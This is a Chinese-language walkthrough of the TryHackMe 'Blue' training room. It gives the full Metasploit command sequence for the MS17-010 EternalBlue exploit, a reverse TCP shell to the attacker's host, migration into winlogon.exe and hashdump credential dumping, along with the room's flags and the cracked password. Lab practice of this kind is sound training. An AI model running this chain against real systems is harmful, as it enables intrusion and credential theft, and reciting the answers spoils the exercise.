Tryhackme 靶機入侵實作 – Blue

項目名稱: Blue

Task.1 Recon 目標偵查

資訊收集 Q1.掃描目標

nmap -A 10.10.66.37

nmap --script=vuln 10.10.66.37

Q2.How many ports are open with a port number under 1000?

A:3 少於1000的端口有135 139 445

Q3.What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

A:MS17-010

Task.2 Gain Access 獲得初始控制權

Q1.Start Metasploit

msfconsole

Q2.Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

A:exploit/windows/smb/ms17_010_eternalblue

search MS17-010

找到後就導入它吧

use 2

Q3.Show options and set the one required value. What is the name of this value? (All caps for submission)

A:Rhosts

set rhosts <IP>

這邊網站跟你說通常使用原始的Payload是可行的 但為了學習所以我們先設定另一個Payload

set payload windows/x64/shell/reverse_tcp

Q4.執行攻擊腳本

在攻擊之前 我們必須先設定這個腳本的相關參數來讓它能正常運行 首先 我們必須先看看有什麼東西要設定的

show options

可以看到有rhosts lhost要設定

設定目標IP

set rhosts 10.10.66.37

接著設定lhost

先看自己的IP

我們在區網的網域IP是10.17.5.224

set lhost 10.17.5.224

設定完後就來一個最後檢查

確定全部都設定完成後就執行吧

exploit

腳本運行成功 session已成功建立 成功取得目標初始控制權

Q5.將session隱藏至背景執行

CTRL+Z

Task.3 Escalate 提權

既然我們已經拿到了初始訪問權 下一步當然就是升級權限至最高權限

Q1.If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

A:post/multi/manage/shell_to_meterpreter

提示有說是shell_to_meterpreter 所以就去search吧

search shell_to_meterpreter

Q2.Select this (use MODULE_PATH). Show options, what option are we required to change?

A:session

在使用之前需要導入此項

use 0

檢查一下需要什麼設定

show options

需要設定session跟lhost

sessions

可以看到剛剛我們隱藏至背景執行的session

set session 1

設定lhost

set lhost 10.17.5.224

設定完後做最後檢查

Q3.Set the required option, you may need to list all of the sessions to find your target here.

剛剛已經設定完了 所以這一步可以跳過

Q4.Run! If this doesn’t work, try completing the exploit from the previous task once more.

執行exploit

exploit

運行成功 可以看到已經創建了新的session

Q5.Once the meterpreter shell conversion completes, select that session for use.

轉換到session 2上

sessions 2

Q6.Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

為了驗證是否取得最高管理員權限 切換到DOS Shell上並運行whoami

shell

whoami

確定身分為最高管理權限 隱藏DOS Shell至後台 使用Meterpreter作為主要Shell

CTRL+Z

Q7.List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

我們的權限是系統管理員不意味著我們的Process也是 所以我們必須列出所有的Process並把我們Process轉移到較高權限的Process

使用ps列出所有的Process

ps

Q8.Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

我們可以使用migrate <PID> 來遷移到該PID的Process 但我建議是使用migrate -N <Process Name>來切換 會比較穩定

migrate -N winlogon.exe

Task.4 Cracking 這一步我們要做的主要是取得非默認用戶的密碼並破解它

Q1.Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

A:Jon

在Meterpreter的Shell上輸入hashdump來讓所有使用者的密碼哈希顯示出來

hashdump

可以看到有一個叫Jon的人特別不一樣 這個應該就是非默認用戶

Q2.Copy this password hash to a file and research how to crack it. What is the cracked password?

A:alqfna22

把Jon的後面那半部丟到Crackstation上破解就能看到密碼了

Task.5 Find flags!

最後就是快樂的找Flag時間ㄌ 嘗試找出來ㄅ

Q1.Flag1? This flag can be found at the system root.

A:flag{access_the_machine}

提示說Can you C it? 應該是指C:\ 找一下就找到了

Q2.Flag2? This flag can be found at the location where passwords are stored within Windows.

A:flag{sam_database_elevated_access}

這個Flag的位置在C:\Windows\System32\config\flag2.txt 我到現在還是不太懂提示想表達什麼

Q3.flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

A:flag{admin_documents_can_be_valuable}

這條的提示是你需要更高的權限才能訪問他 代表說我們可能需要到Jon或者是Admin的資料夾去找

心得:

在這台靶機能學到Metersploit這套工具 還有一些關於Process的知識 這台靶機的系統是Windows 對於沒入侵過Windows系統的新手來說可能會是一個阻礙 但能成功入侵這台Windows系統的話 應該就能了解入侵Windows的一部分流程 而且能增加一點經驗

免責聲明

未經事先雙方同意,使用工具攻擊目標是非法的.請遵守當地法律規範.開發者與本作者對此文章不承擔任何責任,也不對任何濫用或損壞負責.

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.